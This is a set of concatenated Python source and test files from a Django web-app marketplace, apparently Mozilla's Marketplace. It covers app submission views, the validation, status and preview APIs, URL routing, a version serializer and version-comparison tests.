cat2 = Category.objects.create(type=amo.ADDON_WEBAPP, name='bling')
self._post_cats([self.cat1.id, cat2.id])
def test_categories_add_and_remove(self):
self._step()
cat2 = Category.objects.create(type=amo.ADDON_WEBAPP, name='bling')
self._post_cats([cat2.id])
def test_categories_remove(self):
# Add another category here so it gets added to the initial formset.
cat2 = Category.objects.create(type=amo.ADDON_WEBAPP, name='bling')
AddonCategory.objects.create(addon=self.webapp, category=cat2)
self._step()
# `cat2` should get removed.
self._post_cats([self.cat1.id])
class TestDone(TestSubmit):
fixtures = fixture('user_999', 'webapp_337141')
def setUp(self):
super(TestDone, self).setUp()
self.webapp = self.get_webapp()
self.url = reverse('submit.app.done', args=[self.webapp.app_slug])
def get_webapp(self):
return Webapp.objects.get(id=337141)
def _step(self, **kw):
data = dict(addon=self.webapp, terms=True, manifest=True,
details=True)
data.update(kw)
self.cl = AppSubmissionChecklist.objects.create(**data)
AddonUser.objects.create(addon=self.webapp, user=self.user)
def test_anonymous(self):
self._test_anonymous()
def test_progress_display(self):
self._step()
self._test_progress_display(['terms', 'manifest', 'details'], 'done')
def test_done(self):
self._step()
res = self.client.get(self.url)
eq_(res.status_code, 200)
class TestNextSteps(amo.tests.TestCase):
# TODO: Delete this test suite once we deploy IARC.
fixtures = fixture('user_999', 'webapp_337141')
def setUp(self):
self.create_switch('iarc')
self.user = UserProfile.objects.get(username='regularuser')
assert self.client.login(username=self.user.email, password='password')
self.webapp = Webapp.objects.get(id=337141)
self.webapp.update(status=amo.STATUS_PENDING)
self.url = reverse('submit.app.done', args=[self.webapp.app_slug])
def test_200(self, **kw):
data = dict(addon=self.webapp, terms=True, manifest=True,
details=True)
data.update(kw)
self.cl = AppSubmissionChecklist.objects.create(**data)
AddonUser.objects.create(addon=self.webapp, user=self.user)
res = self.client.get(self.url)
eq_(res.status_code, 200)
########NEW FILE########
__FILENAME__ = test_views_api
import base64
import os
import json
from nose.tools import eq_, ok_
from mock import patch
from PIL import Image, ImageChops
from django.core.urlresolvers import reverse
import amo.tests
from addons.models import AddonUser
from files.models import FileUpload
from users.models import UserProfile
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
def fake_fetch_manifest(url, upload_pk=None, **kw):
upload = FileUpload.objects.get(pk=upload_pk)
upload.update(validation=json.dumps({'fake_validation': True}))
class ValidationHandler(RestOAuth):
fixtures = fixture('user_2519', 'user_admin')
def setUp(self):
super(ValidationHandler, self).setUp()
self.list_url = reverse('app-validation-list')
self.get_url = None
self.user = UserProfile.objects.get(pk=2519)
def test_has_cors(self):
self.assertCORS(self.client.get(self.list_url), 'post', 'get')
@patch('mkt.submit.views.tasks')
def create(self, tasks_mock, client=None):
tasks_mock.fetch_manifest.side_effect = fake_fetch_manifest
manifest_url = u'http://foo.com/'
if client is None:
client = self.client
res = client.post(self.list_url,
data=json.dumps({'manifest': manifest_url}))
data = json.loads(res.content)
self.get_url = reverse('app-validation-detail',
kwargs={'pk': data['id']})
eq_(tasks_mock.fetch_manifest.call_args[0][0], manifest_url)
eq_(tasks_mock.fetch_manifest.call_args[0][1], data['id'])
return res, data
def get(self):
return FileUpload.objects.all()[0]
def get_error(self, response):
return json.loads(response.content)
class TestAddValidationHandler(ValidationHandler):
def test_verbs(self):
self._allowed_verbs(self.list_url, ['post'])
def test_good(self):
res, data = self.create()
eq_(res.status_code, 201)
eq_(data['processed'], True)
obj = FileUpload.objects.get(uuid=data['id'])
eq_(obj.user, self.user)
def test_missing(self):
res = self.client.post(self.list_url, data=json.dumps({}))
eq_(res.status_code, 400)
eq_(self.get_error(res)['manifest'], ['This field is required.'])
def test_bad(self):
res = self.client.post(self.list_url,
data=json.dumps({'manifest': 'blurgh'}))
eq_(res.status_code, 400)
eq_(self.get_error(res)['manifest'], ['Enter a valid URL.'])
def test_anon(self):
res, data = self.create(client=self.anon)
eq_(res.status_code, 201)
eq_(data['processed'], True)
obj = FileUpload.objects.get(uuid=data['id'])
eq_(obj.user, None)
class TestPackagedValidation(amo.tests.AMOPaths, ValidationHandler):
def setUp(self):
super(TestPackagedValidation, self).setUp()
name = 'mozball.zip'
path = self.packaged_app_path(name)
self.file = base64.b64encode(open(path).read())
self.data = {'data': self.file, 'name': name,
'type': 'application/zip'}
@patch('mkt.submit.views.tasks')
def create(self, tasks_mock, client=None):
if client is None:
client = self.client
res = client.post(self.list_url,
data=json.dumps({'upload': self.data}))
data = json.loads(res.content)
self.get_url = reverse('app-validation-detail',
kwargs={'pk': data['id']})
eq_(tasks_mock.validator.delay.call_args[0][0], data['id'])
return res
def test_good(self):
res = self.create()
eq_(res.status_code, 202)
content = json.loads(res.content)
eq_(content['processed'], False)
obj = FileUpload.objects.get(uuid=content['id'])
eq_(obj.user, self.user)
@patch('mkt.developers.forms.MAX_PACKAGED_APP_SIZE', 2)
def test_too_big(self):
res = self.client.post(self.list_url,
data=json.dumps({'upload': self.data}))
eq_(res.status_code, 400)
eq_(json.loads(res.content)['upload'][0],
'Packaged app too large for submission. '
'Packages must be smaller than 2 bytes.')
def form_errors(self, data, errors):
res = self.client.post(self.list_url,
data=json.dumps({'upload': data}))
eq_(res.status_code, 400)
eq_(self.get_error(res)['upload'], errors)
def test_missing(self):
self.form_errors({'data': self.file, 'name': 'mozball.zip'},
[u'Type and data are required.'])
def test_missing_name(self):
self.form_errors({'data': self.file, 'type': 'application/zip'},
[u'Name not specified.'])
def test_wrong(self):
self.form_errors({'data': self.file, 'name': 'mozball.zip',
'type': 'application/foo'},
[u'Type must be application/zip.'])
def test_invalid(self):
self.form_errors({'data': 'x', 'name': 'mozball.zip',
'type': 'application/foo'},
[u'File must be base64 encoded.'])
class TestGetValidationHandler(ValidationHandler):
def create(self):
res = FileUpload.objects.create(user=self.user, path='http://foo.com')
self.get_url = reverse('app-validation-detail', kwargs={'pk': res.pk})
return res
def test_verbs(self):
self.create()
self._allowed_verbs(self.get_url, ['get'])
def test_check(self):
self.create()
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
def test_anon(self):
self.create()
res = self.anon.get(self.get_url)
eq_(res.status_code, 200)
def test_not_found(self):
url = reverse('app-validation-detail', kwargs={'pk': 12121212121212})
res = self.client.get(url)
eq_(res.status_code, 404)
def test_not_run(self):
self.create()
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
eq_(json.loads(res.content)['processed'], False)
def test_pass(self):
obj = self.create()
obj.update(valid=True)
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['processed'], True)
eq_(data['valid'], True)
def test_failure(self):
obj = self.create()
error = '{"errors": 1, "messages": [{"tier": 1, "message": "nope"}]}'
obj.update(valid=False, validation=error)
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['processed'], True)
eq_(data['valid'], False)
class TestAppStatusHandler(RestOAuth, amo.tests.AMOPaths):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestAppStatusHandler, self).setUp()
self.app = Webapp.objects.get(pk=337141)
AddonUser.objects.create(addon=self.app, user=self.user)
self.get_url = reverse('app-status-detail', kwargs={'pk': self.app.pk})
def get(self, expected_status=200):
res = self.client.get(self.get_url)
eq_(res.status_code, expected_status)
data = json.loads(res.content)
return res, data
def test_verbs(self):
self._allowed_verbs(self.get_url, ['get', 'patch'])
def test_has_no_cors(self):
res = self.client.get(self.get_url)
assert 'access-control-allow-origin' not in res
def test_status(self):
res, data = self.get()
eq_(self.app.status, amo.STATUS_PUBLIC)
eq_(data['status'], 'public')
eq_(data['disabled_by_user'], False)
self.app.update(status=amo.STATUS_NULL)
res, data = self.get()
eq_(data['status'], 'incomplete')
eq_(data['disabled_by_user'], False)
self.app.update(status=amo.STATUS_PENDING)
res, data = self.get()
eq_(data['status'], 'pending')
eq_(data['disabled_by_user'], False)
self.app.update(disabled_by_user=True)
res, data = self.get()
eq_(data['status'], 'pending')
eq_(data['disabled_by_user'], True)
def test_status_not_mine(self):
AddonUser.objects.get(user=self.user).delete()
res = self.client.get(self.get_url)
eq_(res.status_code, 403)
def test_disable(self):
eq_(self.app.disabled_by_user, False)
res = self.client.patch(self.get_url,
data=json.dumps({'disabled_by_user': True}))
eq_(res.status_code, 200)
self.app.reload()
eq_(self.app.disabled_by_user, True)
eq_(self.app.status, amo.STATUS_PUBLIC) # Unchanged, doesn't matter.
def test_disable_not_mine(self):
AddonUser.objects.get(user=self.user).delete()
res = self.client.patch(self.get_url,
data=json.dumps({'disabled_by_user': True}))
eq_(res.status_code, 403)
def test_change_status_to_pending_fails(self):
res = self.client.patch(self.get_url,
data=json.dumps({'status': 'pending'}))
eq_(res.status_code, 400)
data = json.loads(res.content)
ok_('status' in data)
@patch('mkt.webapps.models.Webapp.is_fully_complete')
def test_change_status_to_pending(self, is_fully_complete):
is_fully_complete.return_value = True
self.app.update(status=amo.STATUS_NULL)
res = self.client.patch(self.get_url,
data=json.dumps({'status': 'pending'}))
eq_(res.status_code, 200)
self.app.reload()
eq_(self.app.disabled_by_user, False)
eq_(self.app.status, amo.STATUS_PENDING)
def test_change_status_to_public_fails(self):
self.app.update(status=amo.STATUS_PENDING)
res = self.client.patch(self.get_url,
data=json.dumps({'status': 'public'}))
eq_(res.status_code, 400)
data = json.loads(res.content)
ok_('status' in data)
eq_(self.app.reload().status, amo.STATUS_PENDING)
@patch('mkt.webapps.models.Webapp.is_fully_complete')
def test_incomplete_app(self, is_fully_complete):
is_fully_complete.return_value = False
self.app.update(status=amo.STATUS_NULL)
res = self.client.patch(self.get_url,
data=json.dumps({'status': 'pending'}))
eq_(res.status_code, 400)
data = json.loads(res.content)
self.assertSetEqual(data['status'], self.app.completion_error_msgs())
@patch('mkt.webapps.models.Webapp.is_fully_complete')
def test_public_waiting(self, is_fully_complete):
is_fully_complete.return_value = True
self.app.update(status=amo.STATUS_PUBLIC_WAITING)
res = self.client.patch(self.get_url,
data=json.dumps({'status': 'public'}))
eq_(res.status_code, 200)
eq_(self.app.reload().status, amo.STATUS_PUBLIC)
class TestPreviewHandler(RestOAuth, amo.tests.AMOPaths):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestPreviewHandler, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.user = UserProfile.objects.get(pk=2519)
AddonUser.objects.create(user=self.user, addon=self.app)
self.file = base64.b64encode(open(self.preview_image(), 'r').read())
self.list_url = reverse('app-preview',
kwargs={'pk': self.app.pk})
self.good = {'file': {'data': self.file, 'type': 'image/jpg'},
'position': 1}
def get_error(self, response):
return json.loads(response.content)
def test_has_cors(self):
self.assertCORS(self.client.post(self.list_url),
'post', 'delete', 'get')
def test_post_preview(self):
res = self.client.post(self.list_url, data=json.dumps(self.good))
eq_(res.status_code, 201)
previews = self.app.previews
eq_(previews.count(), 1)
eq_(previews.all()[0].position, 1)
def test_wrong_url(self):
self.list_url = reverse('app-preview',
kwargs={'pk': 'booyah'})
res = self.client.post(self.list_url, data=json.dumps(self.good))
eq_(res.status_code, 404)
data = json.loads(res.content)
eq_(data['detail'], 'Not found')
def test_not_mine(self):
self.app.authors.clear()
res = self.client.post(self.list_url, data=json.dumps(self.good))
eq_(res.status_code, 403)
def test_position_missing(self):
data = {'file': {'data': self.file, 'type': 'image/jpg'}}
res = self.client.post(self.list_url, data=json.dumps(data))
eq_(res.status_code, 400)
eq_(self.get_error(res)['position'], ['This field is required.'])
def test_preview_missing(self):
res = self.client.post(self.list_url, data=json.dumps({}))
eq_(res.status_code, 400)
eq_(self.get_error(res)['position'], ['This field is required.'])
def create(self):
self.client.post(self.list_url, data=json.dumps(self.good))
self.preview = self.app.previews.all()[0]
self.get_url = reverse('app-preview-detail',
kwargs={'pk': self.preview.pk})
def test_delete(self):
self.create()
res = self.client.delete(self.get_url)
eq_(res.status_code, 204)
eq_(self.app.previews.count(), 0)
def test_delete_not_mine(self):
self.create()
self.app.authors.clear()
res = self.client.delete(self.get_url)
eq_(res.status_code, 403)
def test_delete_not_there(self):
self.get_url = reverse('app-preview-detail',
kwargs={'pk': 123123123})
res = self.client.delete(self.get_url)
eq_(res.status_code, 404)
def test_get(self):
self.create()
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
def test_get_not_mine(self):
self.create()
self.app.authors.clear()
res = self.client.get(self.get_url)
eq_(res.status_code, 403)
def test_get_not_there(self):
self.get_url = reverse('app-preview-detail',
kwargs={'pk': 123123123})
res = self.client.get(self.get_url)
eq_(res.status_code, 404)
class TestIconUpdate(RestOAuth, amo.tests.AMOPaths):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestIconUpdate, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.user = UserProfile.objects.get(pk=2519)
AddonUser.objects.create(user=self.user, addon=self.app)
self.file = base64.b64encode(open(self.mozball_image(), 'r').read())
self.url = reverse('app-icon', kwargs={'pk': self.app.pk})
self.data = {'file': {'data': self.file, 'type': 'image/png'}}
def images_are_equal(self, image_file_1, image_file_2):
im1 = Image.open(image_file_1)
im2 = Image.open(image_file_2)
return ImageChops.difference(im1, im2).getbbox() is None
def test_has_cors(self):
self.assertCORS(self.client.post(self.url), 'put')
def test_put_icon_success(self):
res = self.client.put(self.url, data=json.dumps(self.data))
eq_(res.status_code, 200)
def test_correct_new_icon(self):
self.client.put(self.url, data=json.dumps(self.data))
icon_dir = self.app.get_icon_dir()
icon_path = os.path.join(icon_dir, '%s-128.png' % str(self.app.id))
eq_(self.images_are_equal(self.mozball_image(), icon_path), True)
def test_invalid_owner_permissions(self):
self.app.authors.clear()
res = self.client.put(self.url, data=json.dumps(self.data))
eq_(res.status_code, 403)
def test_invalid_icon_type(self):
data = {'file': {'data': self.file, 'type': 'image/gif'}}
res = self.client.put(self.url, data=json.dumps(data))
eq_(res.status_code, 400)
eq_(json.loads(res.content)['file'][0],
u'Icons must be either PNG or JPG.')
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from django.shortcuts import redirect
from lib.misc.urlconf_decorator import decorate
import amo
from amo.decorators import write
from . import views
# These URLs start with /developers/submit/app/<app_slug>/.
submit_apps_patterns = patterns('',
url('^details/%s$' % amo.APP_SLUG, views.details,
name='submit.app.details'),
url('^done/%s$' % amo.APP_SLUG, views.done, name='submit.app.done'),
url('^resume/%s$' % amo.APP_SLUG, views.resume, name='submit.app.resume'),
)
# Decorate all the views as @write so as to bypass cache.
urlpatterns = decorate(write, patterns('',
# Legacy redirects for app submission.
('^app', lambda r: redirect('submit.app')),
# ^ So we can avoid an additional redirect below.
('^app/.*', lambda r: redirect(r.path.replace('/developers/app',
'/developers', 1))),
('^manifest$', lambda r: redirect('submit.app', permanent=True)),
# App submission.
url('^$', views.submit, name='submit.app'),
url('^terms$', views.terms, name='submit.app.terms'),
('', include(submit_apps_patterns)),
))
########NEW FILE########
__FILENAME__ = views
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.db import transaction
from django.shortcuts import redirect, render
from django.utils.translation.trans_real import to_language
import commonware.log
import waffle
from rest_framework import mixins
from rest_framework.exceptions import MethodNotAllowed
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework.status import (HTTP_201_CREATED, HTTP_202_ACCEPTED,
HTTP_400_BAD_REQUEST)
from rest_framework.viewsets import GenericViewSet
import amo
from addons.models import Addon, AddonUser, Preview
from amo.decorators import login_required, write
from .decorators import read_dev_agreement_required, submit_step
from files.models import FileUpload, Platform
from lib.metrics import record_action
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AllowAppOwner, AllowRelatedAppOwner
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.api.forms import NewPackagedForm, PreviewJSONForm
from mkt.constants import DEVICE_LOOKUP
from mkt.developers import tasks
from mkt.developers.decorators import dev_required
from mkt.developers.forms import (AppFormMedia, CategoryForm, NewManifestForm,
PreviewForm, PreviewFormSet)
from mkt.submit.forms import AppDetailsBasicForm
from mkt.submit.models import AppSubmissionChecklist
from mkt.submit.serializers import (AppStatusSerializer, FileUploadSerializer,
PreviewSerializer)
from mkt.webapps.models import Webapp
from users.models import UserProfile
from . import forms
from .decorators import read_dev_agreement_required, submit_step
log = commonware.log.getLogger('z.submit')
def submit(request):
"""Determine which step to redirect user to."""
if not request.user.is_authenticated():
return proceed(request)
# If dev has already agreed, continue to next step.
user = UserProfile.objects.get(pk=request.user.id)
if not user.read_dev_agreement:
return redirect('submit.app.terms')
return manifest(request)
def proceed(request):
"""
This is a fake "Terms" view that we overlay the login.
We link here from the Developer Hub landing page.
"""
if request.user.is_authenticated():
return submit(request)
agreement_form = forms.DevAgreementForm({'read_dev_agreement': True},
instance=None, request=request)
return render(request, 'submit/terms.html',
{'step': 'terms', 'agreement_form': agreement_form,
'proceed': True})
@login_required
@submit_step('terms')
def terms(request):
# If dev has already agreed, continue to next step.
if (getattr(request, 'amo_user', None) and
request.amo_user.read_dev_agreement):
return manifest(request)
agreement_form = forms.DevAgreementForm(
request.POST or {'read_dev_agreement': True},
instance=request.amo_user,
request=request)
if request.POST and agreement_form.is_valid():
agreement_form.save()
return redirect('submit.app')
return render(request, 'submit/terms.html',
{'step': 'terms', 'agreement_form': agreement_form})
@login_required
@read_dev_agreement_required
@submit_step('manifest')
def manifest(request):
form = forms.NewWebappForm(request.POST or None, request=request)
features_form = forms.AppFeaturesForm(request.POST or None)
features_form_valid = features_form.is_valid()
if (request.method == 'POST' and form.is_valid()
and features_form_valid):
with transaction.commit_on_success():
addon = Addon.from_upload(
form.cleaned_data['upload'],
[Platform.objects.get(id=amo.PLATFORM_ALL.id)],
is_packaged=form.is_packaged())
# Set the device type.
for device in form.get_devices():
addon.addondevicetype_set.get_or_create(
device_type=device.id)
# Set the premium type, only bother if it's not free.
premium = form.get_paid()
if premium:
addon.update(premium_type=premium)
if addon.has_icon_in_manifest():
# Fetch the icon, do polling.
addon.update(icon_type='image/png')
else:
# In this case there is no need to do any polling.
addon.update(icon_type='')
AddonUser(addon=addon, user=request.amo_user).save()
# Checking it once. Checking it twice.
AppSubmissionChecklist.objects.create(addon=addon, terms=True,
manifest=True, details=False)
# Create feature profile.
addon.current_version.features.update(**features_form.cleaned_data)
# Call task outside of `commit_on_success` to avoid it running before
# the transaction is committed and not finding the app.
tasks.fetch_icon.delay(addon)
return redirect('submit.app.details', addon.app_slug)
return render(request, 'submit/manifest.html',
{'step': 'manifest', 'features_form': features_form,
'form': form, 'DEVICE_LOOKUP': DEVICE_LOOKUP})
@dev_required
@submit_step('details')
def details(request, addon_id, addon):
# Name, Slug, Description, Privacy Policy, Homepage URL, Support URL,
# Support Email.
form_basic = AppDetailsBasicForm(request.POST or None, instance=addon,
request=request)
form_cats = CategoryForm(request.POST or None, product=addon,
request=request)
form_icon = AppFormMedia(request.POST or None, request.FILES or None,
instance=addon, request=request)
form_previews = PreviewFormSet(request.POST or None, prefix='files',
queryset=addon.get_previews())
# For empty webapp-locale (or no-locale) fields that have
# form-locale values, duplicate them to satisfy the requirement.
form_locale = request.COOKIES.get('current_locale', '')
app_locale = to_language(addon.default_locale)
for name, value in request.POST.items():
if value:
if name.endswith(form_locale):
basename = name[:-len(form_locale)]
else:
basename = name + '_'
othername = basename + app_locale
if not request.POST.get(othername, None):
request.POST[othername] = value
forms = {
'form_basic': form_basic,
'form_cats': form_cats,
'form_icon': form_icon,
'form_previews': form_previews,
}
if request.POST and all(f.is_valid() for f in forms.itervalues()):
addon = form_basic.save(addon)
form_cats.save()
form_icon.save(addon)
for preview in form_previews.forms:
preview.save(addon)
# If this is an incomplete app from the legacy submission flow, it may
# not have device types set yet - so assume it works everywhere.
if not addon.device_types:
for device in amo.DEVICE_TYPES:
addon.addondevicetype_set.create(device_type=device)
AppSubmissionChecklist.objects.get(addon=addon).update(details=True)
# `make_public` if the developer doesn't want the app published
# immediately upon review.
make_public = (amo.PUBLIC_IMMEDIATELY
if form_basic.cleaned_data.get('publish')
else amo.PUBLIC_WAIT)
if addon.premium_type == amo.ADDON_FREE:
if waffle.switch_is_active('iarc'):
# Free apps get STATUS_NULL until content ratings has been
# entered.
# TODO: set to STATUS_PENDING once app gets an IARC rating.
addon.update(make_public=make_public)
else:
addon.update(status=amo.STATUS_PENDING,
make_public=make_public)
else:
# Paid apps get STATUS_NULL until payment information and content
# ratings has been entered.
addon.update(status=amo.STATUS_NULL, make_public=make_public,
highest_status=amo.STATUS_PENDING)
record_action('app-submitted', request, {'app-id': addon.pk})
return redirect('submit.app.done', addon.app_slug)
ctx = {
'step': 'details',
'addon': addon,
}
ctx.update(forms)
return render(request, 'submit/details.html', ctx)
@dev_required
def done(request, addon_id, addon):
# No submit step forced on this page, we don't really care.
if waffle.switch_is_active('iarc'):
return render(request, 'submit/next_steps.html',
{'step': 'next_steps', 'addon': addon})
else:
return render(request, 'submit/done.html',
{'step': 'done', 'addon': addon})
@dev_required
def resume(request, addon_id, addon):
try:
# If it didn't go through the app submission
# checklist. Don't die. This will be useful for
# creating apps with an API later.
step = addon.appsubmissionchecklist.get_next()
except ObjectDoesNotExist:
step = None
return _resume(addon, step)
def _resume(addon, step):
if step:
if step in ['terms', 'manifest']:
return redirect('submit.app.%s' % step)
return redirect(reverse('submit.app.%s' % step,
args=[addon.app_slug]))
return redirect(addon.get_dev_url('edit'))
class ValidationViewSet(CORSMixin, mixins.CreateModelMixin,
mixins.RetrieveModelMixin, GenericViewSet):
cors_allowed_methods = ['get', 'post']
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
permission_classes = [AllowAny]
model = FileUpload
serializer_class = FileUploadSerializer
@write
def create(self, request, *args, **kwargs):
"""
Custom create method allowing us to re-use form logic and distinguish
packaged app from hosted apps, applying delays to the validation task
if necessary.
Doesn't rely on any serializer, just forms.
"""
data = self.request.DATA
packaged = 'upload' in data
form = (NewPackagedForm(data) if packaged
else NewManifestForm(data))
if not form.is_valid():
return Response(form.errors, status=HTTP_400_BAD_REQUEST)
if not packaged:
upload = FileUpload.objects.create(
user=getattr(request, 'amo_user', None))
# The hosted app validator is pretty fast.
tasks.fetch_manifest(form.cleaned_data['manifest'], upload.pk)
else:
upload = form.file_upload
# The packaged app validator is much heavier.
tasks.validator.delay(upload.pk)
log.info('Validation created: %s' % upload.pk)
self.kwargs = {'pk': upload.pk}
# Re-fetch the object, fetch_manifest() might have altered it.
upload = self.get_object()
serializer = self.get_serializer(upload)
status = HTTP_201_CREATED if upload.processed else HTTP_202_ACCEPTED
return Response(serializer.data, status=status)
class StatusViewSet(mixins.RetrieveModelMixin, mixins.UpdateModelMixin,
GenericViewSet):
queryset = Webapp.objects.all()
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
permission_classes = [AllowAppOwner]
serializer_class = AppStatusSerializer
def update(self, request, *args, **kwargs):
# PUT is disallowed, only PATCH is accepted for this endpoint.
if request.method == 'PUT':
raise MethodNotAllowed('PUT')
return super(StatusViewSet, self).update(request, *args, **kwargs)
class PreviewViewSet(CORSMixin, MarketplaceView, mixins.RetrieveModelMixin,
mixins.DestroyModelMixin, GenericViewSet):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
permission_classes = [AllowRelatedAppOwner]
queryset = Preview.objects.all()
cors_allowed_methods = ['get', 'post', 'delete']
serializer_class = PreviewSerializer
def _create(self, request, *args, **kwargs):
"""
Handle creation. This is directly called by the @action on AppViewSet,
allowing the URL to depend on the app id. AppViewSet passes this method
a Webapp instance in kwargs['app'] (optionally raising a 404 if the
app in the URL doesn't exist, or a 403 if the app belongs to someone
else).
Note: this method is called '_create' and not 'create' because DRF
would automatically make an 'app-preview-list' url name if this
method was called 'create', which we don't want - the app-preview-list
url name needs to be generated by AppViewSet's @action to include the
app pk.
"""
app = kwargs['app']
data_form = PreviewJSONForm(request.DATA)
if not data_form.is_valid():
return Response(data_form.errors, status=HTTP_400_BAD_REQUEST)
form = PreviewForm(data_form.cleaned_data)
if not form.is_valid():
return Response(data_form.errors, status=HTTP_400_BAD_REQUEST)
form.save(app)
log.info('Preview created: %s' % form.instance)
serializer = self.get_serializer(form.instance)
return Response(serializer.data, status=HTTP_201_CREATED)
########NEW FILE########
__FILENAME__ = urls
# -*- coding: utf-8 -*-
from django.conf import settings
from django.conf.urls import include, patterns, url
from django.contrib import admin
from django.shortcuts import redirect
from django.views.decorators.cache import cache_page
from django.views.i18n import javascript_catalog
import amo
from apps.users.views import logout
from mkt.account.urls import user_patterns
from mkt.api import oauth
from mkt.detail.views import manifest as mini_manifest
from mkt.developers.views import login
from mkt.operators.urls import url_patterns as operator_patterns
from mkt.purchase.urls import webpay_services_patterns
from mkt.reviewers.urls import url_patterns as reviewer_url_patterns
admin.autodiscover()
handler403 = 'mkt.site.views.handler403'
handler404 = 'mkt.site.views.handler404'
handler500 = 'mkt.site.views.handler500'
urlpatterns = patterns('',
# Non-commonplace app pages
('^app/%s/' % amo.APP_SLUG, include('mkt.detail.urls')),
url('^app/%s/manifest.webapp$' % amo.ADDON_UUID, mini_manifest,
name='detail.manifest'),
# Dev Ecosystem
('^developers/', include('mkt.ecosystem.urls')),
('^ecosystem/', lambda r: redirect('ecosystem.landing', permanent=True)),
# Files
('^files/', include('mkt.files.urls')),
# Replace the "old" Developer Hub with the "new" Marketplace one.
('^developers/', include('mkt.developers.urls')),
# Submission.
('^developers/submit/', include('mkt.submit.urls')),
# Users.
('^users/', include(user_patterns)),
# Reviewer tools.
('^reviewers/', include(reviewer_url_patterns)),
# Account lookup.
('^lookup/', include('mkt.lookup.urls')),
# Bootstrapped operator dashboard.
('^operators/', include(operator_patterns)),
# Javascript translations.
url('^jsi18n.js$', cache_page(60 * 60 * 24 * 365)(javascript_catalog),
{'domain': 'javascript', 'packages': ['zamboni']}, name='jsi18n'),
# webpay / nav.pay() services.
('^services/webpay/', include(webpay_services_patterns)),
# AMO admin (not django admin).
('^admin/', include('zadmin.urls')),
# AMO Marketplace admin (not django admin).
('^admin/', include('mkt.zadmin.urls')),
# Accept extra junk at the end for a cache-busting build id.
url('^addons/buttons.js(?:/.+)?$', 'addons.buttons.js'),
# Developer Registration Login.
url('^login$', login, name='users.login'),
url('^logout$', logout, name='users.logout'),
url('^oauth/register/$', oauth.access_request,
name='mkt.developers.oauth_access_request'),
url('^oauth/token/$', oauth.token_request,
name='mkt.developers.oauth_token_request'),
url('^oauth/authorize/$', oauth.authorize,
name='mkt.developers.oauth_authorize'),
url('^api/', include('mkt.api.urls')),
url('^downloads/', include('mkt.downloads.urls')),
# Try and keep urls without a prefix at the bottom of the list for
# minor performance reasons.
# Misc pages.
('', include('mkt.commonplace.urls')),
('', include('mkt.site.urls')),
# Services.
('', include('amo.urls')),
)
if settings.TEMPLATE_DEBUG:
# Remove leading and trailing slashes so the regex matches.
media_url = settings.MEDIA_URL.lstrip('/').rstrip('/')
urlpatterns += patterns('',
(r'^%s/(?P<path>.*)$' % media_url, 'django.views.static.serve',
{'document_root': settings.MEDIA_ROOT}),
)
if settings.SERVE_TMP_PATH and settings.DEBUG:
# Serves any URL like /tmp/* from your local ./tmp/ dir
urlpatterns += patterns('',
(r'^tmp/(?P<path>.*)$', 'django.views.static.serve',
{'document_root': settings.TMP_PATH}),
)
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from versions.models import Version
from mkt.features.serializers import AppFeaturesSerializer
class SimpleVersionSerializer(serializers.ModelSerializer):
resource_uri = serializers.HyperlinkedIdentityField(
view_name='version-detail')
class Meta:
model = Version
fields = ('version', 'resource_uri')
class VersionSerializer(serializers.ModelSerializer):
addon = serializers.HyperlinkedRelatedField(view_name='app-detail',
read_only=True)
class Meta:
model = Version
fields = ('id', 'addon', '_developer_name', 'releasenotes', 'version')
depth = 0
field_rename = {
'_developer_name': 'developer_name',
'releasenotes': 'release_notes',
'addon': 'app'
}
def to_native(self, obj):
native = super(VersionSerializer, self).to_native(obj)
# Add non-field data to the response.
native.update({
'features': AppFeaturesSerializer().to_native(obj.features),
'is_current_version': obj.addon.current_version == obj,
'releasenotes': (unicode(obj.releasenotes) if obj.releasenotes else
None),
})
# Remap fields to friendlier, more backwards-compatible names.
for old, new in self.Meta.field_rename.items():
native[new] = native[old]
del native[old]
return native
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import os.path
import mock
import path
from nose import SkipTest
from nose.tools import eq_
from django.conf import settings
import amo
import amo.tests
from addons.models import Addon
from amo.tests import addon_factory
from files.models import File, Platform
from versions.compare import (dict_from_int, MAXVERSION, version_dict,
version_int)
from versions.models import Version
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
from mkt.site.fixtures import fixture
def test_version_int():
"""Tests that version_int. Corrects our versions."""
eq_(version_int('3.5.0a1pre2'), 3050000001002)
eq_(version_int(''), 200100)
eq_(version_int('0'), 200100)
eq_(version_int('*'), 99000000200100)
eq_(version_int(MAXVERSION), MAXVERSION)
eq_(version_int(MAXVERSION + 1), MAXVERSION)
eq_(version_int('9999999'), MAXVERSION)
def test_version_int_compare():
eq_(version_int('3.6.*'), version_int('3.6.99'))
assert version_int('3.6.*') > version_int('3.6.8')
def test_version_asterix_compare():
eq_(version_int('*'), version_int('99'))
assert version_int('98.*') < version_int('*')
eq_(version_int('5.*'), version_int('5.99'))
assert version_int('5.*') > version_int('5.0.*')
def test_version_dict():
eq_(version_dict('5.0'),
{'major': 5,
'minor1': 0,
'minor2': None,
'minor3': None,
'alpha': None,
'alpha_ver': None,
'pre': None,
'pre_ver': None})
def test_version_int_unicode():
eq_(version_int(u'\u2322 ugh stephend'), 200100)
def test_dict_from_int():
d = dict_from_int(3050000001002)
